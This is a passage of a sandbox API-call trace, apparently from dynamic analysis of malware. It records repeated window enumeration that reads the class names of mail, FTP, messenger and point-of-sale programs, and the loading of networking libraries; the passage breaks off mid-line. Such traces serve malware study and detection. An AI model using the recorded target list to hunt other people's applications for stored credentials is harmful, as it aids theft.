[0089.083] GetClassNameA (in: hWnd=0x10074, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.083] GetClassNameA (in: hWnd=0x10062, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.083] GetClassNameA (in: hWnd=0x20018, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="#43") returned 3 [0089.083] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0089.083] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0089.083] GetClassNameA (in: hWnd=0x10042, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0089.083] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0089.083] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0089.083] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0089.084] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0089.084] GetClassNameA (in: hWnd=0x30124, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x10050, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0089.084] GetClassNameA (in: hWnd=0x1004c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102ee, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102ec, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102e2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102de, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102dc, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102da, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.084] GetClassNameA (in: hWnd=0x102d8, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102d4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102d2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102d0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102cc, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102be, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102b4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.085] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x1029e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x6024a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x10260, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x10240, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x10238, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.086] GetClassNameA (in: hWnd=0x10236, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10234, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10232, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10230, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x1022a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10228, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10226, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10212, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10208, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x201f2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10156, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x10116, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.087] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.088] GetClassNameA (in: hWnd=0x2009a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.088] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.088] GetClassNameA (in: hWnd=0x10040, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.088] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0089.088] GetClassNameA (in: hWnd=0x20016, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0089.088] Sleep (dwMilliseconds=0x64) [0089.220] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0089.220] GetClassNameA (in: hWnd=0x30122, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0089.221] GetClassNameA (in: hWnd=0x300ac, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x300b0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x400a4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0089.221] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0089.221] GetClassNameA (in: hWnd=0x10070, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x10086, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x10078, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x10076, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.221] GetClassNameA (in: hWnd=0x10072, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.222] GetClassNameA (in: hWnd=0x10052, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Button") returned 6 [0089.222] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0089.222] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.222] GetClassNameA (in: hWnd=0x50092, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.222] GetClassNameA (in: hWnd=0x10088, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0089.222] GetClassNameA (in: hWnd=0x10268, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Military_mission_finish_window") returned 30 [0089.222] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0089.222] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="notepad_class") returned 13 [0089.222] GetClassNameA (in: hWnd=0x10298, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="operamailclass") returned 14 [0089.222] GetClassNameA (in: hWnd=0x10296, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="outlook_window") returned 14 [0089.222] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="omniposclass") returned 12 [0089.222] GetClassNameA (in: hWnd=0x10294, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="pidgin_window") returned 13 [0089.222] GetClassNameA (in: hWnd=0x10292, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="scriptftp_wnd") returned 13 [0089.222] GetClassNameA (in: hWnd=0x10290, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="skypeclass") returned 10 [0089.222] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="smartftp") returned 8 [0089.222] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="thunderbird_") returned 12 [0089.222] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="trillianwnd") returned 11 [0089.222] GetClassNameA (in: hWnd=0x10288, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="webdrivewin") returned 11 [0089.222] GetClassNameA (in: hWnd=0x10286, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="whatsapp_window") returned 15 [0089.222] GetClassNameA (in: hWnd=0x10284, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="winscpapp") returned 9 [0089.223] GetClassNameA (in: hWnd=0x10282, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="yahoomessengerclass") returned 19 [0089.223] GetClassNameA (in: hWnd=0x10280, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="foxmailincmailapp") returned 17 [0089.223] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="fling_win") returned 9 [0089.223] GetClassNameA (in: hWnd=0x20222, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="gmailnotifierpro_wnd") returned 20 [0089.223] Sleep (dwMilliseconds=0x64) [0089.334] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0089.335] Sleep (dwMilliseconds=0x64) [0089.474] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0089.474] Sleep (dwMilliseconds=0x64) [0089.600] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0089.600] Sleep (dwMilliseconds=0x64) [0089.703] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0089.703] Sleep (dwMilliseconds=0x64) [0089.825] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0089.825] Sleep (dwMilliseconds=0x64) [0089.921] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0092.956] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0102.366] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0102.366] Sleep (dwMilliseconds=0x64) [0102.463] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0112.167] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0130.793] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0130.794] Sleep (dwMilliseconds=0x64) [0130.922] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0146.752] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0146.753] Sleep (dwMilliseconds=0x64) [0146.865] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0156.471] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0156.473] Sleep (dwMilliseconds=0x64) [0156.580] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0162.322] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0162.324] Sleep (dwMilliseconds=0x64) [0162.433] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0170.687] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0170.687] Sleep (dwMilliseconds=0x64) [0170.820] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0176.674] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0176.675] Sleep (dwMilliseconds=0x64) [0176.786] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0182.145] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0187.608] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0195.202] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0207.225] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0220.463] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0220.465] Sleep (dwMilliseconds=0x64) [0220.602] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0227.594] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0227.596] Sleep (dwMilliseconds=0x64) [0227.717] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0232.755] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0238.277] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0244.674] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0246.079] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0246.081] Sleep (dwMilliseconds=0x64) [0246.190] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0258.729] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0265.375] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0265.377] Sleep (dwMilliseconds=0x64) [0265.483] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0272.894] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) [0272.895] Sleep (dwMilliseconds=0x64) [0273.003] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) Thread: id = 48 os_tid = 0xf10 Thread: id = 95 os_tid = 0xf58 [0160.799] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77800000 [0160.801] GetProcAddress (hModule=0x77800000, lpProcName="RtlExitUserThread") returned 0x77846930 [0160.803] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x66e0000 [0160.805] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x10) returned 0x66e12f0 [0160.805] LoadLibraryA (lpLibFileName="user32") returned 0x775e0000 [0160.806] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x10 [0160.818] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0160.818] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x12) returned 0x66e12f0 [0160.818] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefefb0000 [0160.819] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x12 [0160.819] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0160.819] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x10) returned 0x66e12f0 [0160.819] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefdb20000 [0160.820] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x10 [0160.821] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0160.821] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0xf) returned 0x66e12f0 [0160.821] LoadLibraryA (lpLibFileName="ole32") returned 0x7feff2f0000 [0160.821] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0xf [0160.821] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0160.822] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x11) returned 0x66e12f0 [0160.822] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef5a80000 [0160.822] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x11 [0160.823] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0160.823] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x10) returned 0x66e12f0 [0160.823] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7feffac0000 [0160.825] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x10 [0160.825] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0160.825] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x10) returned 0x66e12f0 [0160.825] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefce60000 [0160.826] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x10 [0160.826] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0160.826] RtlAllocateHeap (HeapHandle=0x66e0000, Flags=0x8, Size=0x11) returned 0x66e12f0 [0160.826] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefdee0000 [0160.827] RtlSizeHeap (HeapHandle=0x66e0000, Flags=0x0, MemoryPointer=0x66e12f0) returned 0x11 [0160.827] RtlFreeHeap (HeapHandle=0x66e0000, Flags=0x0, BaseAddress=0x66e12f0) returned 1 [0160.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2753ca4, lpParameter=0x2580000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb64 [0160.829] CloseHandle (hObject=0xb64) returned 1 [0160.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2753d80, lpParameter=0x2580000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb64 [0160.830] CloseHandle (hObject=0xb64) returned 1 [0160.830] Sleep (dwMilliseconds=0xa) [0160.839] Sleep (dwMilliseconds=0xa) [0160.854] Sleep (dwMilliseconds=0xa) [0160.870] Sleep (dwMilliseconds=0xa) [0160.885] Sleep (dwMilliseconds=0xa) [0160.901] Sleep (dwMilliseconds=0xa) [0160.917] Sleep (dwMilliseconds=0xa) [0160.933] Sleep (dwMilliseconds=0xa) [0160.979] Sleep (dwMilliseconds=0xa) [0160.995] Sleep (dwMilliseconds=0xa) [0161.010] Sleep (dwMilliseconds=0xa) [0161.026] Sleep (dwMilliseconds=0xa) [0161.061] Sleep (dwMilliseconds=0xa) [0161.073] Sleep (dwMilliseconds=0xa) [0161.088] Sleep (dwMilliseconds=0xa) [0161.104] Sleep (dwMilliseconds=0xa) [0161.120] Sleep (dwMilliseconds=0xa) [0161.135] Sleep (dwMilliseconds=0xa) [0161.151] Sleep (dwMilliseconds=0xa) [0161.199] Sleep (dwMilliseconds=0xa) [0161.213] Sleep (dwMilliseconds=0xa) [0161.231] Sleep (dwMilliseconds=0xa) [0161.244] Sleep (dwMilliseconds=0xa) [0161.260] Sleep (dwMilliseconds=0xa) [0161.276] Sleep (dwMilliseconds=0xa) [0161.291] Sleep (dwMilliseconds=0xa) [0161.309] Sleep (dwMilliseconds=0xa) [0161.325] Sleep (dwMilliseconds=0xa) [0161.338] Sleep (dwMilliseconds=0xa) [0161.353] Sleep (dwMilliseconds=0xa) [0161.369] Sleep (dwMilliseconds=0xa) [0161.417] Sleep (dwMilliseconds=0xa) [0161.435] Sleep (dwMilliseconds=0xa) [0161.447] Sleep (dwMilliseconds=0xa) [0161.463] Sleep (dwMilliseconds=0xa) [0161.478] Sleep (dwMilliseconds=0xa) [0161.494] Sleep (dwMilliseconds=0xa) [0161.509] Sleep (dwMilliseconds=0xa) [0161.526] Sleep (dwMilliseconds=0xa) [0161.541] Sleep (dwMilliseconds=0xa) [0161.557] Sleep (dwMilliseconds=0xa) [0161.572] Sleep (dwMilliseconds=0xa) [0161.588] Sleep (dwMilliseconds=0xa) [0161.603] Sleep (dwMilliseconds=0xa) [0161.619] Sleep (dwMilliseconds=0xa) [0161.635] Sleep (dwMilliseconds=0xa) [0161.651] Sleep (dwMilliseconds=0xa) [0161.674] Sleep (dwMilliseconds=0xa) [0161.681] Sleep (dwMilliseconds=0xa) [0161.697] Sleep (dwMilliseconds=0xa) [0161.712] Sleep (dwMilliseconds=0xa) [0161.728] Sleep (dwMilliseconds=0xa) [0161.745] Sleep (dwMilliseconds=0xa) [0161.759] Sleep (dwMilliseconds=0xa) [0161.806] Sleep (dwMilliseconds=0xa) [0161.823] Sleep (dwMilliseconds=0xa) [0161.837] Sleep (dwMilliseconds=0xa) [0161.853] Sleep (dwMilliseconds=0xa) [0161.868] Sleep (dwMilliseconds=0xa) [0161.884] Sleep (dwMilliseconds=0xa) [0161.900] Sleep (dwMilliseconds=0xa) [0161.915] Sleep (dwMilliseconds=0xa) [0161.931] Sleep (dwMilliseconds=0xa) [0161.946] Sleep (dwMilliseconds=0xa) [0161.963] Sleep (dwMilliseconds=0xa) [0162.009] Sleep (dwMilliseconds=0xa) [0162.024] Sleep (dwMilliseconds=0xa) [0162.065] Sleep (dwMilliseconds=0xa) [0162.072] Sleep (dwMilliseconds=0xa) [0162.087] Sleep (dwMilliseconds=0xa) [0162.102] Sleep (dwMilliseconds=0xa) [0162.118] Sleep (dwMilliseconds=0xa) [0162.133] Sleep (dwMilliseconds=0xa) [0162.149] Sleep (dwMilliseconds=0xa) [0162.165] Sleep (dwMilliseconds=0xa) [0162.212] Sleep (dwMilliseconds=0xa) [0162.234] Sleep 